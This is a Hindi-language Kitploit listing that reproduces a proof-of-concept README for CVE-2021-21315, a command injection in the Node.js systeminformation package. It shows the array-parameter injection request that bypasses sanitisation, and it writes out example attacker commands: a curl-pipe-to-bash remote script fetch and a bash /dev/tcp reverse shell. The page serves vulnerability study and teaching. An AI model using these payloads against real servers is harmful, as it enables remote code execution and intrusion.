Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-21315-PoC — CVE 2021-21315 PoC | Kitploit
उपकरण/GitHubGitHub/forbiddenprogrammer/cve-2021-21315-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubforbiddenprogrammer/cve-2021-21315-poc

CVE-2021-21315-PoC

CVE 2021-21315 PoC

रिपॉजिटरी देखें
1602525 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-21315-systeminformation

यह CVE-2021-21315 के लिए Proof of Concept है जो Node.JS के लिए System Information Library (npm package "systeminformation") को प्रभावित करता है। npmjs.com/systeminformation

"उन सेवा पैरामीटरों की जाँच या सैनिटाइज़ करना सुनिश्चित करें जो si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() को दिए जाते हैं... केवल strings की अनुमति दें, किसी भी arrays को अस्वीकार करें। String सैनिटाइज़ेशन अपेक्षा के अनुरूप काम करता है।"

क्योंकि यह कमज़ोरियाँ अच्छी तरह से समझाई नहीं गई हैं (मेरी राय में), मैंने systeminformation के कमज़ोर संस्करण के आधार पर एक छोटा सा ऐप बनाने का निर्णय लिया। PoC में शामिल है:

  1. Node.js में बना टेस्ट ऐप, जो express और कमज़ोर systeminformation का उपयोग करता है
  2. प्रभावित मशीन पर .txt फ़ाइल बनाने के लिए सरल टेस्टिंग पेलोड

पुनरुत्पादन के चरण:

  1. एप्लिकेशन को Linux सर्वर वातावरण पर चलाएँ
  2. site.com/api/getServices?name=nginx पर GET अनुरोध करें (nginx केवल उदाहरण है) obraz
  3. अब इस तरह अनुरोध भेजने का प्रयास करें: yoursite.com/api/getServices?name=$(echo -e 'Sekurak' > pwn.txt) obraz

यह string सैनिटाइज़ेशन के कारण विफल हो जाएगा: obraz

जैसा कि CVE विवरण में कहा गया है "सैनिटाइज़ेशन अपेक्षा के अनुरूप काम करता है, किसी भी arrays को अस्वीकार करें [...]"

  1. अब यह अनुरोध भेजने का प्रयास करें: yoursite.com/api/getServices?name[]=$(echo -e 'Sekurak' > pwn.txt) obraz इस बार, यदि आप "name" मान को देखें, तो यह सैनिटाइज़ नहीं हुआ था - सफलता! देखते हैं कि कमांड निष्पादित हुई या नहीं
टूल डाउनलोड करें

obraz

सफलता! हमारी कमांड निष्पादित हो गई। बेशक कोई भी "pwn.txt" की परवाह नहीं करता, लेकिन संभावित हमलावर यह कर सकता है:

  1. आंतरिक फ़ाइलें अपलोड कर सकता है, जैसे index.js (हमारे एप्लिकेशन का मूल, जिसमें संभावित API कुंजियाँ, डेटाबेस कनेक्शन स्ट्रिंग और अन्य चीज़ें हो सकती हैं) या अन्य
  2. स्क्रिप्ट डाउनलोड और निष्पादित कर सकता है - curl -s http://server/path/script.sh | bash /dev/stdin arg1 arg2
  3. रिवर्स शेल - bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
  4. प्रोसेस को मार सकता है (आप हमारे टेस्ट node एप्लिकेशन को भी मार सकते हैं)
  5. और भी बुरी चीज़ें....

"Command injection" निर्दोष लगता है, लेकिन यदि कुछ शर्तें पूरी होती हैं तो इसका बहुत बड़ा प्रभाव हो सकता है

समस्या "systeminformation" के संस्करण 5.3.1 में ठीक कर दी गई थी श्रेय https://www.huntr.dev/users/EffectRenan को (उसने कमज़ोरी पाई, हालाँकि मेरी राय में, उसके "PoC" ने वास्तविक दुनिया का प्रभाव नहीं दिखाया)

साथ ही, कुछ CTF में इस PoC का उपयोग करने में संकोच न करें, लेकिन अच्छा होगा यदि आप खोज के लेखक - EffectRean और PoC निर्माता - मुझे श्रेय दें, चियर्स!

अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए इस्तेमाल किया जा सकता है। पूर्व अनुमति के बिना लक्षित प्रणालियों के खिलाफ इस सॉफ्टवेयर का उपयोग करना अवैध है, और इस सॉफ्टवेयर के दुरुपयोग से होने वाली किसी भी क्षति की जिम्मेदारी लेखक की नहीं होगी।